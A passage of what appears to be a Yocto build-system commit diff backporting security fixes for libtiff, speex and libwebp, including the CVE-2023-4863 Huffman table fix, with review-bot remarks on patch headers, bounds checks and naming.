+ * - If a) compression is OJPEG, and b) photometric tag is missing,
+@@ -4147,6 +4069,88 @@ TIFFReadDirectory(TIFF* tif)
+ }
+ }
+
++ /*
++ * Setup appropriate structures (by strip or by tile)
++ * We do that only after the above OJPEG hack which alters SamplesPerPixel
++ * and thus influences the number of strips in the separate planarconfig.
++ */
++ if (!TIFFFieldSet(tif, FIELD_TILEDIMENSIONS)) {
++ tif->tif_dir.td_nstrips = TIFFNumberOfStrips(tif);
++ tif->tif_dir.td_tilewidth = tif->tif_dir.td_imagewidth;
++ tif->tif_dir.td_tilelength = tif->tif_dir.td_rowsperstrip;
++ tif->tif_dir.td_tiledepth = tif->tif_dir.td_imagedepth;
++ tif->tif_flags &= ~TIFF_ISTILED;
++ } else {
++ tif->tif_dir.td_nstrips = TIFFNumberOfTiles(tif);
++ tif->tif_flags |= TIFF_ISTILED;
++ }
++ if (!tif->tif_dir.td_nstrips) {
++ TIFFErrorExt(tif->tif_clientdata, module,
++ "Cannot handle zero number of %s",
++ isTiled(tif) ? "tiles" : "strips");
++ goto bad;
++ }
++ tif->tif_dir.td_stripsperimage = tif->tif_dir.td_nstrips;
++ if (tif->tif_dir.td_planarconfig == PLANARCONFIG_SEPARATE)
++ tif->tif_dir.td_stripsperimage /= tif->tif_dir.td_samplesperpixel;
++ if (!TIFFFieldSet(tif, FIELD_STRIPOFFSETS)) {
++#ifdef OJPEG_SUPPORT
++ if ((tif->tif_dir.td_compression==COMPRESSION_OJPEG) &&
++ (isTiled(tif)==0) &&
++ (tif->tif_dir.td_nstrips==1)) {
++ /*
++ * XXX: OJPEG hack.
++ * If a) compression is OJPEG, b) it's not a tiled TIFF,
++ * and c) the number of strips is 1,
++ * then we tolerate the absence of stripoffsets tag,
++ * because, presumably, all required data is in the
++ * JpegInterchangeFormat stream.
++ */
++ TIFFSetFieldBit(tif, FIELD_STRIPOFFSETS);
++ } else
++#endif
++ {
++ MissingRequired(tif,
++ isTiled(tif) ? "TileOffsets" : "StripOffsets");
++ goto bad;
++ }
++ }
++
++ if( tif->tif_mode == O_RDWR &&
++ tif->tif_dir.td_stripoffset_entry.tdir_tag != 0 &&
++ tif->tif_dir.td_stripoffset_entry.tdir_count == 0 &&
++ tif->tif_dir.td_stripoffset_entry.tdir_type == 0 &&
++ tif->tif_dir.td_stripoffset_entry.tdir_offset.toff_long8 == 0 &&
++ tif->tif_dir.td_stripbytecount_entry.tdir_tag != 0 &&
++ tif->tif_dir.td_stripbytecount_entry.tdir_count == 0 &&
++ tif->tif_dir.td_stripbytecount_entry.tdir_type == 0 &&
++ tif->tif_dir.td_stripbytecount_entry.tdir_offset.toff_long8 == 0 )
++ {
++ /* Directory typically created with TIFFDeferStrileArrayWriting() */
++ TIFFSetupStrips(tif);
++ }
++ else if( !(tif->tif_flags&TIFF_DEFERSTRILELOAD) )
++ {
++ if( tif->tif_dir.td_stripoffset_entry.tdir_tag != 0 )
++ {
++ if (!TIFFFetchStripThing(tif,&(tif->tif_dir.td_stripoffset_entry),
++ tif->tif_dir.td_nstrips,
++ &tif->tif_dir.td_stripoffset_p))
++ {
++ goto bad;
++ }
++ }
++ if( tif->tif_dir.td_stripbytecount_entry.tdir_tag != 0 )
++ {
++ if (!TIFFFetchStripThing(tif,&(tif->tif_dir.td_stripbytecount_entry),
++ tif->tif_dir.td_nstrips,
++ &tif->tif_dir.td_stripbytecount_p))
++ {
++ goto bad;
++ }
++ }
++ }
++
+ /*
+ * Make sure all non-color channels are extrasamples.
+ * If it's not the case, define them as such.
+--
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1355.patch b/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1355.patch
new file mode 100644
index 0000000000..e59f5aad55
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1355.patch
@@ -0,0 +1,62 @@
+From fb1db384959698edd6caeea84e28253d272a0f96 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Sat, 2 Apr 2022 22:33:31 +0200
+Subject: [PATCH] tiffcp: avoid buffer overflow in "mode" string (fixes #400)
+
+CVE: CVE-2022-1355
+
+Upstream-Status: Backport
+[https://gitlab.com/libtiff/libtiff/-/commit/c1ae29f9ebacd29b7c3e0c7db671af7db3584bc2]
+
+Signed-off-by: Yi Zhao <yi.zhao@windriver.com>
+---
+ tools/tiffcp.c | 25 ++++++++++++++++++++-----
+ 1 file changed, 20 insertions(+), 5 deletions(-)
+
+diff --git a/tools/tiffcp.c b/tools/tiffcp.c
+index fd129bb7..8d944ff6 100644
+--- a/tools/tiffcp.c
++++ b/tools/tiffcp.c
+@@ -274,19 +274,34 @@ main(int argc, char* argv[])
+ deftilewidth = atoi(optarg);
+ break;
+ case 'B':
+- *mp++ = 'b'; *mp = '\0';
++ if (strlen(mode) < (sizeof(mode) - 1))
++ {
++ *mp++ = 'b'; *mp = '\0';
++ }
+ break;
+ case 'L':
+- *mp++ = 'l'; *mp = '\0';
++ if (strlen(mode) < (sizeof(mode) - 1))
++ {
++ *mp++ = 'l'; *mp = '\0';
++ }
+ break;
+ case 'M':
+- *mp++ = 'm'; *mp = '\0';
++ if (strlen(mode) < (sizeof(mode) - 1))
++ {
++ *mp++ = 'm'; *mp = '\0';
++ }
+ break;
+ case 'C':
+- *mp++ = 'c'; *mp = '\0';
++ if (strlen(mode) < (sizeof(mode) - 1))
++ {
++ *mp++ = 'c'; *mp = '\0';
++ }
+ break;
+ case '8':
+- *mp++ = '8'; *mp = '\0';
++ if (strlen(mode) < (sizeof(mode)-1))
++ {
++ *mp++ = '8'; *mp = '\0';
++ }
+ break;
+ case 'x':
+ pageInSeq = 1;
+--
+2.25.1
+
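Review bot: When `mode` is already full, the new guard in the `'B'`, `'L'`, `'M'`, `'C'` and `'8'` cases drops the option silently, so tiffcp continues with an open mode that differs from what the command line asked for. A warning on stderr in that case would make the truncation visible to the user. The same three-line check is pasted five times (once with different spacing, `sizeof(mode)-1`), so a small static helper that appends one character would keep the bound in a single place. The guard is only correct if `mode` is declared as an array rather than a pointer, and that declaration is outside the hunk.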
diff --git a/meta/recipes-multimedia/libtiff/tiff/eecb0712f4c3a5b449f70c57988260a667ddbdef.patch b/meta/recipes-multimedia/libtiff/tiff/eecb0712f4c3a5b449f70c57988260a667ddbdef.patch
new file mode 100644
index 0000000000..fc5d0ab5f4
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/tiff/eecb0712f4c3a5b449f70c57988260a667ddbdef.patch
@@ -0,0 +1,30 @@
+From eecb0712f4c3a5b449f70c57988260a667ddbdef Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Sun, 6 Feb 2022 13:08:38 +0100
+Subject: [PATCH] TIFFFetchStripThing(): avoid calling memcpy() with a null
+ source pointer and size of zero (fixes #362)
+
+Upstream-Status: Backport
+CVE: CVE-2022-0561
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+Comment: Refreshed patch
+---
+ libtiff/tif_dirread.c | 5 +++--
+ 1 file changed, 3 insertions(+), 2 deletions(-)
+
+diff --git a/libtiff/tif_dirread.c b/libtiff/tif_dirread.c
+index 23194ced..50ebf8ac 100644
+--- a/libtiff/tif_dirread.c
++++ b/libtiff/tif_dirread.c
+@@ -5683,8 +5682,9 @@
+ _TIFFfree(data);
+ return(0);
+ }
+- _TIFFmemcpy(resizeddata,data,(uint32)dir->tdir_count*sizeof(uint64));
+- _TIFFmemset(resizeddata+(uint32)dir->tdir_count,0,(nstrips-(uint32)dir->tdir_count)*sizeof(uint64));
++ if( dir->tdir_count )
++ _TIFFmemcpy(resizeddata,data, (uint32)dir->tdir_count * sizeof(uint64));
++ _TIFFmemset(resizeddata+(uint32)dir->tdir_count, 0, (nstrips - (uint32)dir->tdir_count) * sizeof(uint64));
+ _TIFFfree(data);
+ data=resizeddata;
+ }
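Review bot: `Upstream-Status: Backport` in this patch header carries no upstream reference, unlike the CVE-2022-1355 patch added in the same change, so the backport cannot be checked against its origin from the header alone. The `From` line names commit eecb0712f4c3a5b449f70c57988260a667ddbdef; putting the link to that commit in brackets after `Backport`, in the form the sibling patch uses, would close the gap. `Comment: Refreshed patch` also does not say what differs from upstream, and one sentence on whether only context or also code was adjusted would help anyone auditing the CVE-2022-0561 fix.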
diff --git a/meta/recipes-multimedia/libtiff/tiff_4.1.0.bb b/meta/recipes-multimedia/libtiff/tiff_4.1.0.bb
index 1f92c18513..7efaba3a38 100644
--- a/meta/recipes-multimedia/libtiff/tiff_4.1.0.bb
+++ b/meta/recipes-multimedia/libtiff/tiff_4.1.0.bb
@@ -1,10 +1,59 @@
SUMMARY = "Provides support for the Tag Image File Format (TIFF)"
+DESCRIPTION = "Library provides support for the Tag Image File Format \
+(TIFF), a widely used format for storing image data. This library \
+provide means to easily access and create TIFF image files."
+HOMEPAGE = "http://www.libtiff.org/"
LICENSE = "BSD-2-Clause"
LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=34da3db46fab7501992f9615d7e158cf"
CVE_PRODUCT = "libtiff"
SRC_URI = "http://download.osgeo.org/libtiff/tiff-${PV}.tar.gz \
+ file://CVE-2020-35523.patch \
+ file://CVE-2020-35524-1.patch \
+ file://CVE-2020-35524-2.patch \
+ file://001_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch \
+ file://002_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch \
+ file://CVE-2020-35521_and_CVE-2020-35522.patch \
+ file://0001-tiffset-fix-global-buffer-overflow-for-ASCII-tags-wh.patch \
+ file://561599c99f987dc32ae110370cfdd7df7975586b.patch \
+ file://eecb0712f4c3a5b449f70c57988260a667ddbdef.patch \
+ file://CVE-2022-0865.patch \
+ file://CVE-2022-0908.patch \
+ file://CVE-2022-0907.patch \
+ file://CVE-2022-0909.patch \
+ file://CVE-2022-0891.patch \
+ file://CVE-2022-0924.patch \
+ file://CVE-2022-2056-CVE-2022-2057-CVE-2022-2058.patch \
+ file://CVE-2022-34526.patch \
+ file://CVE-2022-2867-CVE-2022-2868-CVE-2022-2869.patch \
+ file://CVE-2022-1354.patch \
+ file://CVE-2022-1355.patch \
+ file://CVE-2022-3570_3598.patch \
+ file://CVE-2022-3597_3626_3627.patch \
+ file://CVE-2022-3599.patch \
+ file://CVE-2022-3970.patch \
+ file://CVE-2022-48281.patch \
+ file://CVE-2023-0795_0796_0797_0798_0799.patch \
+ file://CVE-2023-0800_0801_0802_0803_0804.patch \
+ file://CVE-2023-1916.patch \
+ file://CVE-2023-25433.patch \
+ file://CVE-2023-25434-CVE-2023-25435.patch \
+ file://CVE-2023-26965.patch \
+ file://CVE-2023-26966.patch \
+ file://CVE-2023-2908.patch \
+ file://CVE-2023-3316.patch \
+ file://CVE-2023-3576.patch \
+ file://CVE-2023-3618.patch \
+ file://CVE-2023-40745.patch \
+ file://CVE-2023-41175.patch \
+ file://CVE-2022-40090.patch \
+ file://CVE-2023-6228.patch \
+ file://CVE-2023-6277-1.patch \
+ file://CVE-2023-6277-2.patch \
+ file://CVE-2023-6277-3.patch \
+ file://CVE-2023-6277-4.patch \
+ file://CVE-2023-52356.patch \
"
SRC_URI[md5sum] = "2165e7aba557463acc0664e71a3ed424"
SRC_URI[sha256sum] = "5d29f32517dadb6dbcd1255ea5bbc93a2b54b94fbf83653b4d65c7d6775b8634"
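Review bot: Two of the added `SRC_URI` entries, `561599c99f987dc32ae110370cfdd7df7975586b.patch` and `eecb0712f4c3a5b449f70c57988260a667ddbdef.patch`, are named by commit hash while every other entry names the CVE it closes, which makes the list harder to reconcile with a CVE scan report. The second one carries `CVE: CVE-2022-0561` in its header, so `file://CVE-2022-0561.patch` would match the rest; the header of the first is not visible here, so its name would have to come from its own `CVE:` tag. `CVE-2022-40090.patch` also sits between the 2023 entries, and a short comment would help if that position is required for the series to apply.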
@@ -12,6 +61,10 @@ SRC_URI[sha256sum] = "5d29f32517dadb6dbcd1255ea5bbc93a2b54b94fbf83653b4d65c7d677
# exclude betas
UPSTREAM_CHECK_REGEX = "tiff-(?P<pver>\d+(\.\d+)+).tar"
+# Tested with check from https://security-tracker.debian.org/tracker/CVE-2015-7313
+# and 4.1.0 doesn't have the issue
+CVE_CHECK_WHITELIST += "CVE-2015-7313"
+
inherit autotools multilib_header
CACHED_CONFIGUREVARS = "ax_cv_check_gl_libgl=no"
diff --git a/meta/recipes-multimedia/mpeg2dec/mpeg2dec_0.5.1.bb b/meta/recipes-multimedia/mpeg2dec/mpeg2dec_0.5.1.bb
index 00ca3675ca..d603602584 100644
--- a/meta/recipes-multimedia/mpeg2dec/mpeg2dec_0.5.1.bb
+++ b/meta/recipes-multimedia/mpeg2dec/mpeg2dec_0.5.1.bb
@@ -1,5 +1,9 @@
SUMMARY = "Library and test program for decoding MPEG-2 and MPEG-1 video streams"
-HOMEPAGE = "http://libmpeg2.sourceforge.net/"
+DESCRIPTION = "mpeg2dec is a test program for libmpeg2. It decodes \
+mpeg-1 and mpeg-2 video streams, and also includes a demultiplexer \
+for mpeg-1 and mpeg-2 program streams. The main purpose of mpeg2dec \
+is to have a simple test bed for libmpeg2."
+HOMEPAGE = "https://libmpeg2.sourceforge.io/"
SECTION = "libs"
LICENSE = "GPLv2+"
LICENSE_FLAGS = "commercial"
diff --git a/meta/recipes-multimedia/pulseaudio/pulseaudio.inc b/meta/recipes-multimedia/pulseaudio/pulseaudio.inc
index c7f3e67022..317983edb2 100644
--- a/meta/recipes-multimedia/pulseaudio/pulseaudio.inc
+++ b/meta/recipes-multimedia/pulseaudio/pulseaudio.inc
@@ -1,4 +1,6 @@
SUMMARY = "Sound server for Linux and Unix-like operating systems"
+DESCRIPTION = "A general purpose sound server intended to run as a middleware \
+between your applications and your hardware devices, either using ALSA or OSS."
HOMEPAGE = "http://www.pulseaudio.org"
AUTHOR = "Lennart Poettering"
SECTION = "libs/multimedia"
@@ -137,11 +139,6 @@ EXTRA_OECONF_append_armeb = "${@bb.utils.contains("TUNE_FEATURES", "neon", "", "
export TARGET_PFPU = "${TARGET_FPU}"
-# TODO: Use more fine granular version
-#OE_LT_RPATH_ALLOW=":${libdir}/pulse-0.9:"
-OE_LT_RPATH_ALLOW = "any"
-OE_LT_RPATH_ALLOW[export]="1"
-
set_cfg_value () {
sed -i -e "s/\(; *\)\?$2 =.*/$2 = $3/" "$1"
if ! grep -q "^$2 = $3\$" "$1"; then
diff --git a/meta/recipes-multimedia/speex/speex/CVE-2020-23903.patch b/meta/recipes-multimedia/speex/speex/CVE-2020-23903.patch
new file mode 100644
index 0000000000..eb16e95ffc
--- /dev/null
+++ b/meta/recipes-multimedia/speex/speex/CVE-2020-23903.patch
@@ -0,0 +1,30 @@
+Backport patch to fix CVE-2020-23903.
+
+CVE: CVE-2020-23903
+Upstream-Status: Backport [https://github.com/xiph/speex/commit/870ff84]
+
+Signed-off-by: Kai Kang <kai.kang@windriver.com>
+
+From 870ff845b32f314aec0036641ffe18aba4916887 Mon Sep 17 00:00:00 2001
+From: Tristan Matthews <tmatth@videolan.org>
+Date: Mon, 13 Jul 2020 23:25:03 -0400
+Subject: [PATCH] wav_io: guard against invalid channel numbers
+
+Fixes #13
+---
+ src/wav_io.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/wav_io.c b/src/wav_io.c
+index b5183015..09d62eb0 100644
+--- a/src/wav_io.c
++++ b/src/wav_io.c
+@@ -111,7 +111,7 @@ int read_wav_header(FILE *file, int *rate, int *channels, int *format, spx_int32
+ stmp = le_short(stmp);
+ *channels = stmp;
+
+- if (stmp>2)
++ if (stmp>2 || stmp<1)
+ {
+ fprintf (stderr, "Only mono and (intensity) stereo supported\n");
+ return -1;
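Review bot: `*channels = stmp;` still runs before the widened range check, so on the `return -1` path the caller's variable already holds the rejected value, which can now be zero or negative as well as above 2. Moving the assignment below the check keeps an invalid count away from a caller that does not test the return value. The message `Only mono and (intensity) stereo supported` is now also printed for a count below 1, where wording about an invalid channel count would describe the input better. read_wav_header starts and ends outside the hunk.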
diff --git a/meta/recipes-multimedia/speex/speex_1.2.0.bb b/meta/recipes-multimedia/speex/speex_1.2.0.bb
index 3a0911d6f8..ea475f0f1b 100644
--- a/meta/recipes-multimedia/speex/speex_1.2.0.bb
+++ b/meta/recipes-multimedia/speex/speex_1.2.0.bb
@@ -7,7 +7,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=314649d8ba9dd7045dfb6683f298d0a8 \
file://include/speex/speex.h;beginline=1;endline=34;md5=ef8c8ea4f7198d71cf3509c6ed05ea50"
DEPENDS = "libogg speexdsp"
-SRC_URI = "http://downloads.xiph.org/releases/speex/speex-${PV}.tar.gz"
+SRC_URI = "http://downloads.xiph.org/releases/speex/speex-${PV}.tar.gz \
+ file://CVE-2020-23903.patch \
+ "
UPSTREAM_CHECK_REGEX = "speex-(?P<pver>\d+(\.\d+)+)\.tar"
SRC_URI[md5sum] = "8ab7bb2589110dfaf0ed7fa7757dc49c"
diff --git a/meta/recipes-multimedia/webp/files/CVE-2023-1999.patch b/meta/recipes-multimedia/webp/files/CVE-2023-1999.patch
new file mode 100644
index 0000000000..d293ab93ab
--- /dev/null
+++ b/meta/recipes-multimedia/webp/files/CVE-2023-1999.patch
@@ -0,0 +1,55 @@
+From a486d800b60d0af4cc0836bf7ed8f21e12974129 Mon Sep 17 00:00:00 2001
+From: James Zern <jzern@google.com>
+Date: Wed, 22 Feb 2023 22:15:47 -0800
+Subject: [PATCH] EncodeAlphaInternal: clear result->bw on error
+
+This avoids a double free should the function fail prior to
+VP8BitWriterInit() and a previous trial result's buffer carried over.
+Previously in ApplyFiltersAndEncode() trial.bw (with a previous
+iteration's buffer) would be freed, followed by best.bw pointing to the
+same buffer.
+
+Since:
+187d379d add a fallback to ALPHA_NO_COMPRESSION
+
+In addition, check the return value of VP8BitWriterInit() in this
+function.
+
+Bug: webp:603
+Change-Id: Ic258381ee26c8c16bc211d157c8153831c8c6910
+
+CVE: CVE-2023-1999
+Upstream-Status: Backport [https://github.com/webmproject/libwebp/commit/a486d800b60d0af4cc0836bf7ed8f21e12974129]
+Signed-off-by: Nikhil R <nikhil.r@kpit.com>
+---
+ src/enc/alpha_enc.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/src/enc/alpha_enc.c b/src/enc/alpha_enc.c
+index f7c02690e3..7d205586fe 100644
+--- a/src/enc/alpha_enc.c
++++ b/src/enc/alpha_enc.c
+@@ -13,6 +13,7 @@
+
+ #include <assert.h>
+ #include <stdlib.h>
++#include <string.h>
+
+ #include "src/enc/vp8i_enc.h"
+ #include "src/dsp/dsp.h"
+@@ -148,6 +149,7 @@ static int EncodeAlphaInternal(const uint8_t* const data, int width, int height,
+ }
+ } else {
+ VP8LBitWriterWipeOut(&tmp_bw);
++ memset(&result->bw, 0, sizeof(result->bw));
+ return 0;
+ }
+ }
+@@ -162,7 +164,7 @@ static int EncodeAlphaInternal(const uint8_t* const data, int width, int height,
+ header = method | (filter << 2);
+ if (reduce_levels) header |= ALPHA_PREPROCESSED_LEVELS << 4;
+
+- VP8BitWriterInit(&result->bw, ALPHA_HEADER_LEN + output_size);
++ if (!VP8BitWriterInit(&result->bw, ALPHA_HEADER_LEN + output_size)) ok = 0;
+ ok = ok && VP8BitWriterAppend(&result->bw, &header, ALPHA_HEADER_LEN);
+ ok = ok && VP8BitWriterAppend(&result->bw, output, output_size);
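Review bot: The `memset(&result->bw, 0, sizeof(result->bw));` added on the error return in EncodeAlphaInternal has no comment, and its reason (a buffer left in `result->bw` by an earlier trial would otherwise be freed a second time by the caller) is recorded only in the commit message. A short comment above it, such as `// Drop any buffer carried over from a previous trial so the caller cannot free it twice.`, would keep a later cleanup from removing the line. The function starts and ends outside the hunk, so whether other early returns need the same reset cannot be checked from here.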
diff --git a/meta/recipes-multimedia/webp/files/CVE-2023-4863-0001.patch b/meta/recipes-multimedia/webp/files/CVE-2023-4863-0001.patch
new file mode 100644
index 0000000000..419b12f7d9
--- /dev/null
+++ b/meta/recipes-multimedia/webp/files/CVE-2023-4863-0001.patch
@@ -0,0 +1,366 @@
+From 902bc9190331343b2017211debcec8d2ab87e17a Mon Sep 17 00:00:00 2001
+From: Vincent Rabaud <vrabaud@google.com>
+Date: Thu, 7 Sep 2023 21:16:03 +0200
+Subject: [PATCH 1/2] Fix OOB write in BuildHuffmanTable.
+
+First, BuildHuffmanTable is called to check if the data is valid.
+If it is and the table is not big enough, more memory is allocated.
+
+This will make sure that valid (but unoptimized because of unbalanced
+codes) streams are still decodable.
+
+Bug: chromium:1479274
+Change-Id: I31c36dbf3aa78d35ecf38706b50464fd3d375741
+
+CVE: CVE-2023-4863
+
+Upstream-Status: Backport [https://github.com/webmproject/libwebp/commit/902bc9190331343b2017211debcec8d2ab87e17a]
+
+Signed-off-by: Soumya Sambu <soumya.sambu@windriver.com>
+---
+ src/dec/vp8l_dec.c | 46 ++++++++++---------
+ src/dec/vp8li_dec.h | 2 +-
+ src/utils/huffman_utils.c | 97 +++++++++++++++++++++++++++++++--------
+ src/utils/huffman_utils.h | 27 +++++++++--
+ 4 files changed, 129 insertions(+), 43 deletions(-)
+
+diff --git a/src/dec/vp8l_dec.c b/src/dec/vp8l_dec.c
+index 93615d4..0d38314 100644
+--- a/src/dec/vp8l_dec.c
++++ b/src/dec/vp8l_dec.c
+@@ -253,11 +253,11 @@ static int ReadHuffmanCodeLengths(
+ int symbol;
+ int max_symbol;
+ int prev_code_len = DEFAULT_CODE_LENGTH;
+- HuffmanCode table[1 << LENGTHS_TABLE_BITS];
++ HuffmanTables tables;
+
+- if (!VP8LBuildHuffmanTable(table, LENGTHS_TABLE_BITS,
+- code_length_code_lengths,
+- NUM_CODE_LENGTH_CODES)) {
++ if (!VP8LHuffmanTablesAllocate(1 << LENGTHS_TABLE_BITS, &tables) ||
++ !VP8LBuildHuffmanTable(&tables, LENGTHS_TABLE_BITS,
++ code_length_code_lengths, NUM_CODE_LENGTH_CODES)) {
+ goto End;
+ }
+
+@@ -277,7 +277,7 @@ static int ReadHuffmanCodeLengths(
+ int code_len;
+ if (max_symbol-- == 0) break;
+ VP8LFillBitWindow(br);
+- p = &table[VP8LPrefetchBits(br) & LENGTHS_TABLE_MASK];
++ p = &tables.curr_segment->start[VP8LPrefetchBits(br) & LENGTHS_TABLE_MASK];
+ VP8LSetBitPos(br, br->bit_pos_ + p->bits);
+ code_len = p->value;
+ if (code_len < kCodeLengthLiterals) {
+@@ -300,6 +300,7 @@ static int ReadHuffmanCodeLengths(
+ ok = 1;
+
+ End:
++ VP8LHuffmanTablesDeallocate(&tables);
+ if (!ok) dec->status_ = VP8_STATUS_BITSTREAM_ERROR;
+ return ok;
+ }
+@@ -307,7 +308,8 @@ static int ReadHuffmanCodeLengths(
+ // 'code_lengths' is pre-allocated temporary buffer, used for creating Huffman
+ // tree.
+ static int ReadHuffmanCode(int alphabet_size, VP8LDecoder* const dec,
+- int* const code_lengths, HuffmanCode* const table) {
++ int* const code_lengths,
++ HuffmanTables* const table) {
+ int ok = 0;
+ int size = 0;
+ VP8LBitReader* const br = &dec->br_;
+@@ -362,8 +364,7 @@ static int ReadHuffmanCodes(VP8LDecoder* const dec, int xsize, int ysize,
+ VP8LMetadata* const hdr = &dec->hdr_;
+ uint32_t* huffman_image = NULL;
+ HTreeGroup* htree_groups = NULL;
+- HuffmanCode* huffman_tables = NULL;
+- HuffmanCode* huffman_table = NULL;
++ HuffmanTables* huffman_tables = &hdr->huffman_tables_;
+ int num_htree_groups = 1;
+ int num_htree_groups_max = 1;
+ int max_alphabet_size = 0;
+@@ -372,6 +373,10 @@ static int ReadHuffmanCodes(VP8LDecoder* const dec, int xsize, int ysize,
+ int* mapping = NULL;
+ int ok = 0;
+
++ // Check the table has been 0 initialized (through InitMetadata).
++ assert(huffman_tables->root.start == NULL);
++ assert(huffman_tables->curr_segment == NULL);
++
+ if (allow_recursion && VP8LReadBits(br, 1)) {
+ // use meta Huffman codes.
+ const int huffman_precision = VP8LReadBits(br, 3) + 2;
+@@ -434,16 +439,15 @@ static int ReadHuffmanCodes(VP8LDecoder* const dec, int xsize, int ysize,
+
+ code_lengths = (int*)WebPSafeCalloc((uint64_t)max_alphabet_size,
+ sizeof(*code_lengths));
+- huffman_tables = (HuffmanCode*)WebPSafeMalloc(num_htree_groups * table_size,
+- sizeof(*huffman_tables));
+ htree_groups = VP8LHtreeGroupsNew(num_htree_groups);
+
+- if (htree_groups == NULL || code_lengths == NULL || huffman_tables == NULL) {
++ if (htree_groups == NULL || code_lengths == NULL ||
++ !VP8LHuffmanTablesAllocate(num_htree_groups * table_size,
++ huffman_tables)) {
+ dec->status_ = VP8_STATUS_OUT_OF_MEMORY;
+ goto Error;
+ }
+
+- huffman_table = huffman_tables;
+ for (i = 0; i < num_htree_groups_max; ++i) {
+ // If the index "i" is unused in the Huffman image, just make sure the
+ // coefficients are valid but do not store them.
+@@ -468,19 +472,20 @@ static int ReadHuffmanCodes(VP8LDecoder* const dec, int xsize, int ysize,
+ int max_bits = 0;
+ for (j = 0; j < HUFFMAN_CODES_PER_META_CODE; ++j) {
+ int alphabet_size = kAlphabetSize[j];
+- htrees[j] = huffman_table;
+ if (j == 0 && color_cache_bits > 0) {
+ alphabet_size += (1 << color_cache_bits);
+ }
+- size = ReadHuffmanCode(alphabet_size, dec, code_lengths, huffman_table);
++ size =
++ ReadHuffmanCode(alphabet_size, dec, code_lengths, huffman_tables);
++ htrees[j] = huffman_tables->curr_segment->curr_table;
+ if (size == 0) {
+ goto Error;
+ }
+ if (is_trivial_literal && kLiteralMap[j] == 1) {
+- is_trivial_literal = (huffman_table->bits == 0);
++ is_trivial_literal = (htrees[j]->bits == 0);
+ }
+- total_size += huffman_table->bits;
+- huffman_table += size;
++ total_size += htrees[j]->bits;
++ huffman_tables->curr_segment->curr_table += size;
+ if (j <= ALPHA) {
+ int local_max_bits = code_lengths[0];
+ int k;
+@@ -515,14 +520,13 @@ static int ReadHuffmanCodes(VP8LDecoder* const dec, int xsize, int ysize,
+ hdr->huffman_image_ = huffman_image;
+ hdr->num_htree_groups_ = num_htree_groups;
+ hdr->htree_groups_ = htree_groups;
+- hdr->huffman_tables_ = huffman_tables;
+
+ Error:
+ WebPSafeFree(code_lengths);
+ WebPSafeFree(mapping);
+ if (!ok) {
+ WebPSafeFree(huffman_image);
+- WebPSafeFree(huffman_tables);
++ VP8LHuffmanTablesDeallocate(huffman_tables);
+ VP8LHtreeGroupsFree(htree_groups);
+ }
+ return ok;
+@@ -1354,7 +1358,7 @@ static void ClearMetadata(VP8LMetadata* const hdr) {
+ assert(hdr != NULL);
+
+ WebPSafeFree(hdr->huffman_image_);
+- WebPSafeFree(hdr->huffman_tables_);
++ VP8LHuffmanTablesDeallocate(&hdr->huffman_tables_);
+ VP8LHtreeGroupsFree(hdr->htree_groups_);
+ VP8LColorCacheClear(&hdr->color_cache_);
+ VP8LColorCacheClear(&hdr->saved_color_cache_);
+@@ -1670,7 +1674,7 @@ int VP8LDecodeImage(VP8LDecoder* const dec) {
+ // Sanity checks.
+ if (dec == NULL) return 0;
+
+- assert(dec->hdr_.huffman_tables_ != NULL);
++ assert(dec->hdr_.huffman_tables_.root.start != NULL);
+ assert(dec->hdr_.htree_groups_ != NULL);
+ assert(dec->hdr_.num_htree_groups_ > 0);
+
+diff --git a/src/dec/vp8li_dec.h b/src/dec/vp8li_dec.h
+index 72b2e86..32540a4 100644
+--- a/src/dec/vp8li_dec.h
++++ b/src/dec/vp8li_dec.h
+@@ -51,7 +51,7 @@ typedef struct {
+ uint32_t* huffman_image_;
+ int num_htree_groups_;
+ HTreeGroup* htree_groups_;
+- HuffmanCode* huffman_tables_;
++ HuffmanTables huffman_tables_;
+ } VP8LMetadata;
+
+ typedef struct VP8LDecoder VP8LDecoder;
+diff --git a/src/utils/huffman_utils.c b/src/utils/huffman_utils.c
+index 0cba0fb..9efd628 100644
+--- a/src/utils/huffman_utils.c
++++ b/src/utils/huffman_utils.c
+@@ -177,21 +177,24 @@ static int BuildHuffmanTable(HuffmanCode* const root_table, int root_bits,
+ if (num_open < 0) {
+ return 0;
+ }
+- if (root_table == NULL) continue;
+ for (; count[len] > 0; --count[len]) {
+ HuffmanCode code;
+ if ((key & mask) != low) {
+- table += table_size;
++ if (root_table != NULL) table += table_size;
+ table_bits = NextTableBitSize(count, len, root_bits);
+ table_size = 1 << table_bits;
+ total_size += table_size;
+ low = key & mask;
+- root_table[low].bits = (uint8_t)(table_bits + root_bits);
+- root_table[low].value = (uint16_t)((table - root_table) - low);
++ if (root_table != NULL) {
++ root_table[low].bits = (uint8_t)(table_bits + root_bits);
++ root_table[low].value = (uint16_t)((table - root_table) - low);
++ }
++ }
++ if (root_table != NULL) {
++ code.bits = (uint8_t)(len - root_bits);
++ code.value = (uint16_t)sorted[symbol++];
++ ReplicateValue(&table[key >> root_bits], step, table_size, code);
+ }
+- code.bits = (uint8_t)(len - root_bits);
+- code.value = (uint16_t)sorted[symbol++];
+- ReplicateValue(&table[key >> root_bits], step, table_size, code);
+ key = GetNextKey(key, len);
+ }
+ }
+@@ -211,25 +214,83 @@ static int BuildHuffmanTable(HuffmanCode* const root_table, int root_bits,
+ ((1 << MAX_CACHE_BITS) + NUM_LITERAL_CODES + NUM_LENGTH_CODES)
+ // Cut-off value for switching between heap and stack allocation.
+ #define SORTED_SIZE_CUTOFF 512
+-int VP8LBuildHuffmanTable(HuffmanCode* const root_table, int root_bits,
++int VP8LBuildHuffmanTable(HuffmanTables* const root_table, int root_bits,
+ const int code_lengths[], int code_lengths_size) {
+- int total_size;
++ const int total_size =
